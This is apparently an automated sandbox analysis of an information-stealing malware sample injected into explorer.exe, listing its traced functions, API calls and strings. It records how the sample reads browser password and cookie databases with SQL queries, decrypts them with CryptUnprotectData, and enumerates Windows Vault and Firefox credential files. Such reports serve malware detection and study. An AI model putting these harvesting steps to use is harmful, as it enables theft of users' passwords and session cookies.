431e8e FindNextFileW 27902->27904 27905 431ddd lstrcmpiW 27902->27905 27903 431953 6 API calls 27903->27907 27906 431ea2 FindClose 27904->27906 27904->27907 27905->27904 27908 431df5 27905->27908 27906->27900 27907->27902 27907->27903 27909 43199d 9 API calls 27907->27909 27910 4319b4 lstrlenW 27908->27910 27912 431011 3 API calls 27908->27912 27914 431953 6 API calls 27908->27914 27915 43199d 9 API calls 27908->27915 27916 431d4a 12 API calls 27908->27916 27917 431cf7 GetProcessHeap RtlAllocateHeap lstrlenW RtlComputeCrc32 27908->27917 27911 431e54 lstrcmpiW 27909->27911 27910->27908 27911->27908 27912->27904 27914->27908 27915->27908 27916->27908 27917->27908 28056 457d8b _allrem memcpy 28161 4513ca 86 API calls 28058 44fd97 19 API calls 28163 44cb91 18 API calls 28164 43bf9a _alldiv 28059 431198 GetProcessHeap RtlAllocateHeap CryptBinaryToStringA CryptBinaryToStringA 27580 43639e 27584 43b1e3 27580->27584 27604 43b1e5 27580->27604 27581 4363b2 27585 43b1e5 27584->27585 27588 43b214 27585->27588 27638 43aeea 27585->27638 27587 43b233 27590 43b28f 27587->27590 27624 43a7ae 27587->27624 27588->27587 27588->27590 27656 43ae65 27588->27656 27590->27581 27592 43b26d 27662 43a1c6 18 API calls 27592->27662 27593 43b2d6 27635 436a5a 27593->27635 27599 43b310 CreateFileMappingW 27600 43b32b MapViewOfFile 27599->27600 27601 43b37e 27599->27601 27600->27601 27602 43b2e8 27600->27602 27663 43a1c6 18 API calls 27601->27663 27602->27590 27602->27599 27605 43b20d 27604->27605 27609 43b214 27604->27609 27606 43aeea 25 API calls 27605->27606 27606->27609 27607 43ae65 21 API calls 27610 43b233 27607->27610 27608 43b28f 27608->27581 27609->27607 27609->27608 27609->27610 27610->27608 27611 43a7ae 18 API calls 27610->27611 27614 43b267 27611->27614 27612 43b26d 27735 43a1c6 18 API calls 27612->27735 27613 43b2d6 27615 436a5a 17 API calls 27613->27615 27614->27608 27614->27612 27614->27613 27617 43a67c 21 API calls 27614->27617 27622 43b2e8 27615->27622 27618 43b2be 27617->27618 27618->27612 27618->27613 27619 43b310 CreateFileMappingW 27620 43b32b MapViewOfFile 27619->27620 27621 43b37e 27619->27621 27620->27621 27620->27622 27736 43a1c6 18 API calls 27621->27736 27622->27608 27622->27619 27626 43a7c7 27624->27626 27625 43a805 27625->27590 27625->27592 27625->27593 27628 43a67c 27625->27628 27626->27625 27664 43a1c6 18 API calls 27626->27664 27629 43a6c1 27628->27629 27630 43a694 _alldiv _allmul 27628->27630 27665 43a33b SetFilePointer 27629->27665 27630->27629 27634 43a6ee 27634->27592 27634->27593 27636 48307c 17 API calls 27635->27636 27637 436a65 27636->27637 27637->27602 27671 436a81 27638->27671 27640 43af01 27641 436a81 memset 27640->27641 27655 43af07 27640->27655 27642 43af2a 27641->27642 27642->27655 27675 437f07 27642->27675 27645 43af54 27645->27655 27678 4852ae 27645->27678 27648 43affa 27649 43b020 27648->27649 27650 43b000 27648->27650 27651 43ae65 21 API calls 27649->27651 27701 43a1c6 18 API calls 27650->27701 27653 43b01c 27651->27653 27653->27655 27696 43adcc 27653->27696 27655->27588 27658 43ae7a 27656->27658 27657 43ae83 27657->27587 27658->27657 27659 43a67c 21 API calls 27658->27659 27660 43aea5 27659->27660 27660->27657 27734 43a1c6 18 API calls 27660->27734 27662->27590 27663->27590 27664->27625 27666 43a390 27665->27666 27667 43a36a 27665->27667 27666->27634 27669 43a1c6 18 API calls 27666->27669 27667->27666 27670 43a1c6 18 API calls 27667->27670 27669->27634 27670->27666 27672 436a8f 27671->27672 27673 436a95 memset 27672->27673 27674 436aa4 27672->27674 27673->27674 27674->27640 27702 437ec7 27675->27702 27679 4852bb 27678->27679 27680 43afd9 27679->27680 27707 46ba08 _allmul 27679->27707 27682 43b87b 27680->27682 27683 43b88d memset 27682->27683 27685 43b8e5 27683->27685 27685->27683 27689 43ba14 27685->27689 27690 43ba41 27685->27690 27695 43ba3c 27685->27695 27708 43b609 27685->27708 27711 43b64b 18 API calls 27685->27711 27712 43bb9f 18 API calls 27685->27712 27713 43a2aa 17 API calls 27685->27713 27714 43a1c6 18 API calls 27689->27714 27694 4852ae _allmul 27690->27694 27692 43ba32 27715 484db2 17 API calls 27692->27715 27694->27695 27695->27648 27700 43ade4 27696->27700 27697 43ae5f 27697->27655 27700->27697 27720 43bafc 27700->27720 27731 43a39e 18 API calls 27700->27731 27701->27653 27703 437ed9 27702->27703 27704 437ed4 27702->27704 27706 436e6a 17 API calls 27703->27706 27704->27645 27706->27704 27707->27680 27716 43a08a 27708->27716 27710 43b60f 27710->27685 27711->27685 27712->27685 27713->27685 27714->27692 27715->27695 27717 43a0a4 27716->27717 27718 43a0aa 27717->27718 27719 436a81 memset 27717->27719 27718->27710 27719->27718 27721 43b609 memset 27720->27721 27727 43bb14 27721->27727 27722 43bb3f GetFileAttributesW 27723 43bb4b 27722->27723 27722->27727 27725 43bb5b 27723->27725 27726 43bb7d 27723->27726 27724 43bb25 DeleteFileW 27724->27726 27724->27727 27732 43a1c6 18 API calls 27725->27732 27733 43a2aa 17 API calls 27726->27733 27727->27722 27727->27724 27727->27725 27730 43bb1a 27727->27730 27730->27700 27731->27700 27732->27730 27733->27730 27734->27657 27735->27608 27736->27608 27783 431b9d 27784 431ba2 27783->27784 27785 431bc1 27783->27785 27784->27785 27786 431ba9 GetFileAttributesW 27784->27786 27787 431bb5 27786->27787 28165 458ba6 7 API calls 28060 4411a0 41 API calls 28166 4753ad memset memcpy memset memcpy 28167 4733b7 27 API calls 28063 459dbc 25 API calls 28168 4513ca 87 API calls

                                                                                                                            Executed Functions

                                                                                                                            Function 00433717 Relevance: 45.9, APIs: 19, Strings: 7, Instructions: 401stringfileencryptionCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 0 433717-433730 call 431b6a 3 433c37-433c3d 0->3 4 433736-43374c 0->4 5 433762-43379c call 431000 GetTempPathW GetTempFileNameW DeleteFileW CopyFileW 4->5 6 43374e-433757 call 43302d 4->6 11 4337a8-4337b5 call 484bec 5->11 12 43379e-4337a3 call 43349b 5->12 9 43375c-43375e 6->9 9->5 16 433c15-433c1e DeleteFileW call 431011 11->16 17 4337bb-4337d3 call 46eeb8 11->17 12->11 21 433c23-433c28 16->21 22 4337d9-4337f1 call 431000 call 4502ec 17->22 23 433c0c-433c10 call 483848 17->23 21->3 24 433c2a-433c32 call 432ffa 21->24 31 433bd0-433be3 call 44fb92 lstrlen 22->31 32 4337f7 22->32 23->16 24->3 37 433c05-433c07 call 431011 31->37 38 433be5-433c00 call 431798 * 3 31->38 34 4337fc-433816 call 431fa7 32->34 41 433bb6-433bc6 call 4502ec 34->41 42 43381c-43382d 34->42 37->23 38->37 41->34 52 433bcc 41->52 46 433833-433843 RtlCompareMemory 42->46 47 433a37-433a51 CryptUnprotectData 42->47 46->47 51 433849-43384b 46->51 47->41 49 433a57-433a5c 47->49 49->41 53 433a62-433a78 call 431fa7 49->53 51->47 55 433851-433856 51->55 52->31 62 433a86-433a9d call 431fa7 53->62 63 433a7a-433a80 53->63 55->47 58 43385c-433861 55->58 58->47 60 433867-4338ed RtlZeroMemory call 431000 58->60 73 4338f3-433909 call 431fa7 60->73 74 433a2e-433a32 60->74 68 433aab-433ac2 call 431fa7 62->68 69 433a9f-433aa5 62->69 63->62 65 433a82 63->65 65->62 78 433ad0-433aed call 431fa7 68->78 79 433ac4-433aca 68->79 69->68 71 433aa7 69->71 71->68 83 433917-43392d call 431fa7 73->83 84 43390b-433911 73->84 77 433bb1 call 431011 74->77 77->41 90 433af7-433b01 78->90 91 433aef-433af1 78->91 79->78 82 433acc 79->82 82->78 92 43393b-433952 call 431fa7 83->92 93 43392f-433935 83->93 84->83 86 433913 84->86 86->83 95 433b03-433b05 90->95 96 433b0f-433b1b lstrlen 90->96 91->90 94 433af3 91->94 103 433960-433979 call 431fa7 92->103 104 433954-43395a 92->104 93->92 98 433937 93->98 94->90 95->96 100 433b07-433b0b 95->100 96->41 97 433b21-433b2a lstrlen 96->97 97->41 102 433b30-433b4f call 431000 97->102 98->92 100->96 110 433b51 102->110 111 433b59-433b93 call 432112 wsprintfA lstrlen 102->111 112 433987-433993 lstrlen 103->112 113 43397b-433981 103->113 104->103 106 43395c 104->106 106->103 110->111 118 433ba3-433baf lstrcat 111->118 119 433b95-433ba1 call 43102f 111->119 112->74 117 433999-4339a2 lstrlen 112->117 113->112 115 433983 113->115 115->112 117->74 120 4339a8-4339c7 call 431000 117->120 118->77 119->118 125 4339d1-433a0b call 432112 wsprintfA lstrlen 120->125 126 4339c9 120->126 129 433a1b-433a29 lstrcat call 431011 125->129 130 433a0d-433a19 call 43102f 125->130 126->125 129->74 130->129
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00431B6A: CreateFileW.KERNELBASE(00000000,00000080,00000000,00000000,00000003,00000000,00000000,00000000,00432893,00000000,00000000,00000000,?), ref: 00431B82
                                                                                                                              • Part of subcall function 00431B6A: CloseHandle.KERNELBASE(00000000), ref: 00431B8F
                                                                                                                            • GetTempPathW.KERNEL32(00000104,00000000), ref: 00433778
                                                                                                                            • GetTempFileNameW.KERNELBASE(00000000,00000000,00000000,00000000), ref: 00433782
                                                                                                                            • DeleteFileW.KERNELBASE(00000000), ref: 00433789
                                                                                                                            • CopyFileW.KERNELBASE(?,00000000,00000000), ref: 00433794
                                                                                                                            • RtlCompareMemory.NTDLL(00000000,?,00000003), ref: 0043383B
                                                                                                                            • RtlZeroMemory.NTDLL(?,00000040), ref: 00433870
                                                                                                                            • lstrlen.KERNEL32(?,?,?,?,?), ref: 0043398B
                                                                                                                            • lstrlen.KERNEL32(00000000), ref: 0043399A
                                                                                                                            • wsprintfA.USER32 ref: 004339F1
                                                                                                                            • lstrlen.KERNEL32(00000000,?,?), ref: 004339FD
                                                                                                                            • lstrcat.KERNEL32(00000000,?), ref: 00433A21
                                                                                                                            • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00433A49
                                                                                                                            • lstrlen.KERNEL32(?,00000000,00000000,00000000,00000000), ref: 00433B13
                                                                                                                            • lstrlen.KERNEL32(00000000), ref: 00433B22
                                                                                                                            • wsprintfA.USER32 ref: 00433B79
                                                                                                                            • lstrlen.KERNEL32(00000000), ref: 00433B85
                                                                                                                            • lstrcat.KERNEL32(00000000,?), ref: 00433BA9
                                                                                                                            • lstrlen.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 00433BDA
                                                                                                                            • DeleteFileW.KERNELBASE(00000000,00000000,?), ref: 00433C16
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000D.00000002.3226044754.0000000000431000.00000040.80000000.00040000.00000000.sdmp, Offset: 00431000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_13_2_431000_explorer.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: lstrlen$File$DeleteMemoryTemplstrcatwsprintf$CloseCompareCopyCreateCryptDataHandleNamePathUnprotectZero
                                                                                                                            • String ID: %sTRUE%s%s%s%s%s$0$COOKIES$FALSE$SELECT host_key,path,is_secure,name,encrypted_value FROM cookies$TRUE$v1
                                                                                                                            • API String ID: 584740257-404540950
                                                                                                                            • Opcode ID: a4704bf0a5f378ace2102f47440095f567c2b4a82f1af463ddeb2d8cba48db84
                                                                                                                            • Instruction ID: 4a1019d9b8e64eefd1f36e02d83f3393fb165fe123e2b8b145f72a99b4c5513d
                                                                                                                            • Opcode Fuzzy Hash: a4704bf0a5f378ace2102f47440095f567c2b4a82f1af463ddeb2d8cba48db84
                                                                                                                            • Instruction Fuzzy Hash: B4E1CD70208341AFD715EF25C884B2FBBE9AF89359F04582EF48587262DB39DD05CB5A
                                                                                                                            Function 00432198 Relevance: 33.5, APIs: 12, Strings: 7, Instructions: 242libraryloaderCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 134 432198-4321c9 RtlZeroMemory GetVersionExW 135 4321d7-4321dc 134->135 136 4321cb-4321d0 134->136 138 4321de 135->138 139 4321e3-4321f6 LoadLibraryW 135->139 137 4321d2 136->137 136->138 137->135 138->139 140 43249b-4324a3 139->140 141 4321fc-43223e GetProcAddress * 5 139->141 142 432492-43249a FreeLibrary 141->142 143 432244-43224a 141->143 142->140 143->142 144 432250-432252 143->144 144->142 145 432258-43225a 144->145 145->142 146 432260-432265 145->146 146->142 147 43226b-432277 146->147 148 43227e-432280 147->148 148->142 149 432286-4322a5 148->149 151 43248b-43248f 149->151 152 4322ab-4322b3 149->152 151->142 153 432483 152->153 154 4322b9-4322c5 152->154 153->151 155 4322c9-4322db 154->155 156 4322e1-4322f1 RtlCompareMemory 155->156 157 432365-432375 RtlCompareMemory 155->157 158 432452-432475 156->158 160 4322f7-432348 call 431953 * 3 156->160 157->158 159 43237b-4323c9 call 431953 * 3 157->159 158->155 163 43247b-43247f 158->163 176 4323e4-4323ea 159->176 178 4323cb-4323dc call 431953 159->178 160->176 177 43234e-432363 call 431953 160->177 163->153 181 432431-432433 176->181 182 4323ec-4323ee 176->182 190 4323e0 177->190 178->190 184 432435-432437 call 431011 181->184 185 43243c-43243e 181->185 187 4323f0-4323f2 182->187 188 43242a-43242c call 431011 182->188 184->185 192 432440-432442 call 431011 185->192 193 432447-432449 185->193 187->188 194 4323f4-4323f6 187->194 188->181 190->176 192->193 193->158 197 43244b-43244d call 431011 193->197 194->188 196 4323f8-432406 StrStrIW 194->196 198 432426 196->198 199 432408-432421 call 4317c0 * 3 196->199 197->158 198->188 199->198
                                                                                                                            APIs
                                                                                                                            • RtlZeroMemory.NTDLL(?,00000114), ref: 004321AF
                                                                                                                            • GetVersionExW.KERNEL32(?), ref: 004321BE
                                                                                                                            • LoadLibraryW.KERNELBASE(vaultcli.dll), ref: 004321E8
                                                                                                                            • GetProcAddress.KERNEL32(00000000,VaultOpenVault), ref: 0043220A
                                                                                                                            • GetProcAddress.KERNEL32(00000000,VaultCloseVault), ref: 00432214
                                                                                                                            • GetProcAddress.KERNEL32(00000000,VaultEnumerateItems), ref: 00432220
                                                                                                                            • GetProcAddress.KERNEL32(00000000,VaultGetItem), ref: 0043222A
                                                                                                                            • GetProcAddress.KERNEL32(00000000,VaultFree), ref: 00432236
                                                                                                                            • RtlCompareMemory.NTDLL(?,00491110,00000010), ref: 004322E8
                                                                                                                            • RtlCompareMemory.NTDLL(?,00491110,00000010), ref: 0043236C
                                                                                                                              • Part of subcall function 00431953: lstrlenW.KERNEL32(?,00000000,00000000,?,?,00432F0C), ref: 00431973
                                                                                                                              • Part of subcall function 00431953: lstrlenW.KERNEL32(00486564,?,?,00432F0C), ref: 00431978
                                                                                                                              • Part of subcall function 00431953: lstrcatW.KERNEL32(00000000,?,?,?,00432F0C), ref: 00431990
                                                                                                                              • Part of subcall function 00431953: lstrcatW.KERNEL32(00000000,00486564,?,?,00432F0C), ref: 00431994
                                                                                                                            • StrStrIW.SHLWAPI(?,Internet Explorer), ref: 004323FE
                                                                                                                            • FreeLibrary.KERNELBASE(00000000), ref: 00432493
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000D.00000002.3226044754.0000000000431000.00000040.80000000.00040000.00000000.sdmp, Offset: 00431000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_13_2_431000_explorer.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressProc$Memory$CompareLibrarylstrcatlstrlen$FreeLoadVersionZero
                                                                                                                            • String ID: Internet Explorer$VaultCloseVault$VaultEnumerateItems$VaultFree$VaultGetItem$VaultOpenVault$vaultcli.dll
                                                                                                                            • API String ID: 2583887280-2831467701
                                                                                                                            • Opcode ID: e5d3e767e1675982d8478db87371a402f9f6296ded96e45e98d94ae9a954a031
                                                                                                                            • Instruction ID: 2b70c0cdde8322ba86d4e9ca1c0f81224b390b0d3aae2b8a935526ab81f7eeed
                                                                                                                            • Opcode Fuzzy Hash: e5d3e767e1675982d8478db87371a402f9f6296ded96e45e98d94ae9a954a031
                                                                                                                            • Instruction Fuzzy Hash: 4491AC71A083419FD758DF65C984A2FBBE5AF9C704F00582EF98597261EBB8D801CB4A
                                                                                                                            Function 00433098 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 248fileencryptionCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 261 433098-4330b1 call 431b6a 264 4330b7-4330cd 261->264 265 4333ba-4333c0 261->265 266 4330e3-433128 call 431000 GetTempPathW GetTempFileNameW DeleteFileW CopyFileW call 484bec 264->266 267 4330cf-4330d8 call 43302d 264->267 274 43339b-4333a4 DeleteFileW call 431011 266->274 275 43312e-433146 call 46eeb8 266->275 270 4330dd-4330df 267->270 270->266 278 4333a9-4333ab 274->278 281 433392-433396 call 483848 275->281 282 43314c-433158 call 4502ec 275->282 278->265 280 4333ad-4333b5 call 432ffa 278->280 280->265 281->274 287 433389-43338d call 44fb92 282->287 288 43315e-433161 282->288 287->281 289 433165-43317f call 431fa7 288->289 293 433185-433196 289->293 294 43336f-43337b call 4502ec 289->294 295 4332cd-4332e7 CryptUnprotectData 293->295 296 43319c-4331ac RtlCompareMemory 293->296 294->289 303 433381-433385 294->303 295->294 298 4332ed-4332f2 295->298 296->295 299 4331b2-4331b4 296->299 298->294 301 4332f4-43330a call 431fa7 298->301 299->295 302 4331ba-4331bf 299->302 308 433318-43332f call 431fa7 301->308 309 43330c-433312 301->309 302->295 305 4331c5-4331ca 302->305 303->287 305->295 307 4331d0-433253 RtlZeroMemory call 431000 305->307 321 433255-43326b call 431fa7 307->321 322 4332bd 307->322 315 433331-433337 308->315 316 43333d-433343 308->316 309->308 311 433314 309->311 311->308 315->316 320 433339 315->320 318 433351-43336a call 431798 * 3 316->318 319 433345-43334b 316->319 318->294 319->318 324 43334d 319->324 320->316 330 433279-43328e call 431fa7 321->330 331 43326d-433273 321->331 323 4332c1-4332c8 call 431011 322->323 323->294 324->318 339 433290-433296 330->339 340 43329c-4332bb call 431798 * 3 330->340 331->330 334 433275 331->334 334->330 339->340 341 433298 339->341 340->323 341->340
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00431B6A: CreateFileW.KERNELBASE(00000000,00000080,00000000,00000000,00000003,00000000,00000000,00000000,00432893,00000000,00000000,00000000,?), ref: 00431B82
                                                                                                                              • Part of subcall function 00431B6A: CloseHandle.KERNELBASE(00000000), ref: 00431B8F
                                                                                                                            • GetTempPathW.KERNEL32(00000104,00000000), ref: 004330F9
                                                                                                                            • GetTempFileNameW.KERNELBASE(00000000,00000000,00000000,00000000), ref: 00433103
                                                                                                                            • DeleteFileW.KERNELBASE(00000000), ref: 0043310A
                                                                                                                            • CopyFileW.KERNELBASE(?,00000000,00000000), ref: 00433115
                                                                                                                            • RtlCompareMemory.NTDLL(00000000,00000000,00000003), ref: 004331A4
                                                                                                                            • RtlZeroMemory.NTDLL(?,00000040), ref: 004331D7
                                                                                                                            • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 004332DF
                                                                                                                            • DeleteFileW.KERNELBASE(00000000,00000000,?), ref: 0043339C
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000D.00000002.3226044754.0000000000431000.00000040.80000000.00040000.00000000.sdmp, Offset: 00431000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_13_2_431000_explorer.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: File$DeleteMemoryTemp$CloseCompareCopyCreateCryptDataHandleNamePathUnprotectZero
                                                                                                                            • String ID: 0$@$SELECT origin_url,username_value,password_value FROM logins$v1
                                                                                                                            • API String ID: 2757140130-4052020286
                                                                                                                            • Opcode ID: 2e6ced6736ad7879f64b5723a48797ace518257ad0f8bbc09ad8c224e8f46639
                                                                                                                            • Instruction ID: 6fa35361312a451785c96f1fdfea81fbde38d1dfd2838ae2a596f9bd94d57f92
                                                                                                                            • Opcode Fuzzy Hash: 2e6ced6736ad7879f64b5723a48797ace518257ad0f8bbc09ad8c224e8f46639
                                                                                                                            • Instruction Fuzzy Hash: 7091BE71208341AFD710DF25C884A2FBBE9AFC9749F04592EF88597261DB39DD04CB1A
                                                                                                                            Function 00433ED9 Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 82stringfileCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 413 433ed9-433ee7 414 433fd1-433fdb 413->414 415 433eed-433ef1 413->415 415->414 416 433ef7-433f21 call 431000 PathCombineW FindFirstFileW 415->416 419 433f27-433f30 416->419 420 433fca-433fcc call 431011 416->420 421 433f32-433f40 lstrcmpiW 419->421 422 433f78-433f86 lstrcmpiW 419->422 420->414 425 433faf-433fbd FindNextFileW 421->425 426 433f42-433f54 lstrcmpiW 421->426 424 433f88-433fa3 call 431000 PathCombineW call 433e04 422->424 422->425 434 433fa8-433faa call 431011 424->434 425->419 428 433fc3-433fc4 FindClose 425->428 426->425 429 433f56-433f71 call 431000 PathCombineW call 433ed9 426->429 428->420 436 433f76 429->436 434->425 436->434
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00431000: GetProcessHeap.KERNEL32(00000008,?,004311C7,?,?,00000001,00000000,?), ref: 00431003
                                                                                                                              • Part of subcall function 00431000: RtlAllocateHeap.NTDLL(00000000), ref: 0043100A
                                                                                                                            • PathCombineW.SHLWAPI(00000000,00000000,*.*,?,00000000), ref: 00433F0A
                                                                                                                            • FindFirstFileW.KERNELBASE(00000000,?,?,00000000), ref: 00433F16
                                                                                                                            • lstrcmpiW.KERNEL32(?,004862CC), ref: 00433F38
                                                                                                                            • lstrcmpiW.KERNEL32(?,004862D0), ref: 00433F4C
                                                                                                                            • PathCombineW.SHLWAPI(00000000,00000000,?), ref: 00433F69
                                                                                                                            • lstrcmpiW.KERNEL32(?,Local State), ref: 00433F7E
                                                                                                                            • PathCombineW.SHLWAPI(00000000,00000000,?), ref: 00433F9B
                                                                                                                            • FindNextFileW.KERNELBASE(00000000,00000010), ref: 00433FB5
                                                                                                                            • FindClose.KERNELBASE(00000000), ref: 00433FC4
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000D.00000002.3226044754.0000000000431000.00000040.80000000.00040000.00000000.sdmp, Offset: 00431000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_13_2_431000_explorer.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CombineFindPathlstrcmpi$FileHeap$AllocateCloseFirstNextProcess
                                                                                                                            • String ID: *.*$Local State
                                                                                                                            • API String ID: 3923353463-3324723383
                                                                                                                            • Opcode ID: cc7d59ff3ce8763302e573171c28b8d0e3419679a6b3d48d3df90a4e04b87549
                                                                                                                            • Instruction ID: cf8446e08cbd7bdca9b116890ceb585c1306ce3298a122dd132e688071826e55
                                                                                                                            • Opcode Fuzzy Hash: cc7d59ff3ce8763302e573171c28b8d0e3419679a6b3d48d3df90a4e04b87549
                                                                                                                            • Instruction Fuzzy Hash: E321CF302002046BD754BF318C0CA2F76BC9F8A316F45292FF812C22A2DB7C9948876E
                                                                                                                            Function 00432B15 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 102filestringCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 438 432b15-432b48 call 431953 FindFirstFileW 442 432b4e 438->442 443 432c5c-432c74 call 431011 * 2 438->443 444 432b52-432b57 442->444 446 432b59-432b6b lstrcmpiW 444->446 447 432bc8-432bef call 431953 call 43199d StrStrIW 444->447 451 432b71-432b83 lstrcmpiW 446->451 452 432c3d-432c4b FindNextFileW 446->452 461 432bf1-432bfa call 431cf7 447->461 462 432c10-432c1e StrStrIW 447->462 451->452 455 432b89-432b94 call 4319b4 451->455 452->444 456 432c51-432c58 FindClose 452->456 463 432b96-432b9b 455->463 464 432b9d 455->464 456->443 461->462 473 432bfc-432c0b call 43278e 461->473 466 432c20-432c29 call 431cf7 462->466 467 432c36-432c38 call 431011 462->467 465 432b9f-432bc3 call 431953 call 43199d call 432ae9 call 431011 463->465 464->465 465->447 466->467 478 432c2b-432c31 call 43287d 466->478 467->452 473->462 478->467
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00431953: lstrlenW.KERNEL32(?,00000000,00000000,?,?,00432F0C), ref: 00431973
                                                                                                                              • Part of subcall function 00431953: lstrlenW.KERNEL32(00486564,?,?,00432F0C), ref: 00431978
                                                                                                                              • Part of subcall function 00431953: lstrcatW.KERNEL32(00000000,?,?,?,00432F0C), ref: 00431990
                                                                                                                              • Part of subcall function 00431953: lstrcatW.KERNEL32(00000000,00486564,?,?,00432F0C), ref: 00431994
                                                                                                                            • FindFirstFileW.KERNELBASE(00000000,?,00000000,00000000,?,00000000), ref: 00432B3D
                                                                                                                            • lstrcmpiW.KERNEL32(?,004862CC), ref: 00432B63
                                                                                                                            • lstrcmpiW.KERNEL32(?,004862D0), ref: 00432B7B
                                                                                                                              • Part of subcall function 004319B4: lstrlenW.KERNEL32(00000000,00000000,00000000,00432CAF,00000000,00000000,?,?,00000000,PathToExe,00000000,00000000), ref: 004319C4
                                                                                                                            • StrStrIW.SHLWAPI(00000000,logins.json), ref: 00432BE7
                                                                                                                            • StrStrIW.SHLWAPI(00000000,cookies.sqlite), ref: 00432C16
                                                                                                                            • FindNextFileW.KERNELBASE(00000000,00000010), ref: 00432C43
                                                                                                                            • FindClose.KERNELBASE(00000000), ref: 00432C52
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000D.00000002.3226044754.0000000000431000.00000040.80000000.00040000.00000000.sdmp, Offset: 00431000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_13_2_431000_explorer.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Findlstrlen$Filelstrcatlstrcmpi$CloseFirstNext
                                                                                                                            • String ID: \*.*$cookies.sqlite$logins.json
                                                                                                                            • API String ID: 1108783765-3717368146
                                                                                                                            • Opcode ID: 8ba857f5a8f3f46ac410c6109af9488e61889ab00dff7fa96b72037c9778ce58
                                                                                                                            • Instruction ID: 69f194283b523d1c5df19f87d188033a830a458e70ef58b31cc99e312d329811
                                                                                                                            • Opcode Fuzzy Hash: 8ba857f5a8f3f46ac410c6109af9488e61889ab00dff7fa96b72037c9778ce58
                                                                                                                            • Instruction Fuzzy Hash: 5431A1303043014B8A54BF329D59A3F739AAF8C304F04693FB95692292EBBDCD06975E
                                                                                                                            Function 00431D4A Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 109stringfileCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 531 431d4a-431d5c 532 431d62-431d66 531->532 533 431eb4-431ebe 531->533 532->533 534 431d6c-431d77 call 4319b4 532->534 537 431d8b-431d97 call 431953 534->537 538 431d79-431d89 call 431953 534->538 543 431d9b-431d9d 537->543 538->543 543->533 544 431da3-431db4 FindFirstFileW 543->544 545 431dba 544->545 546 431ead-431eaf call 431011 544->546 548 431dbe-431dc3 545->548 546->533 549 431dc5-431dd7 lstrcmpiW 548->549 550 431e3d-431e6a call 431953 call 43199d lstrcmpiW 548->550 552 431e8e-431e9c FindNextFileW 549->552 553 431ddd-431def lstrcmpiW 549->553 561 431e87-431e89 call 431011 550->561 562 431e6c-431e75 call 431cf7 550->562 552->548 554 431ea2-431ea9 FindClose 552->554 553->552 556 431df5-431e00 call 4319b4 553->556 554->546 563 431e02-431e07 556->563 564 431e09 556->564 561->552 562->561 571 431e77-431e7f 562->571 565 431e0b-431e3b call 431953 call 43199d call 431d4a 563->565 564->565 565->561 571->561
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 004319B4: lstrlenW.KERNEL32(00000000,00000000,00000000,00432CAF,00000000,00000000,?,?,00000000,PathToExe,00000000,00000000), ref: 004319C4
                                                                                                                            • FindFirstFileW.KERNELBASE(00000000,?,?,00000000), ref: 00431DA9
                                                                                                                            • lstrcmpiW.KERNEL32(?,004862CC), ref: 00431DCF
                                                                                                                            • lstrcmpiW.KERNEL32(?,004862D0), ref: 00431DE7
                                                                                                                            • lstrcmpiW.KERNEL32(?,?), ref: 00431E62
                                                                                                                              • Part of subcall function 00431CF7: lstrlenW.KERNEL32(00000000,00000000,00000000,00432C27), ref: 00431D02
                                                                                                                              • Part of subcall function 00431CF7: RtlComputeCrc32.NTDLL(00000000,00000000,00000000), ref: 00431D0D
                                                                                                                            • FindNextFileW.KERNELBASE(00000000,00000010), ref: 00431E94
                                                                                                                            • FindClose.KERNELBASE(00000000), ref: 00431EA3
                                                                                                                              • Part of subcall function 00431953: lstrlenW.KERNEL32(?,00000000,00000000,?,?,00432F0C), ref: 00431973
                                                                                                                              • Part of subcall function 00431953: lstrlenW.KERNEL32(00486564,?,?,00432F0C), ref: 00431978
                                                                                                                              • Part of subcall function 00431953: lstrcatW.KERNEL32(00000000,?,?,?,00432F0C), ref: 00431990
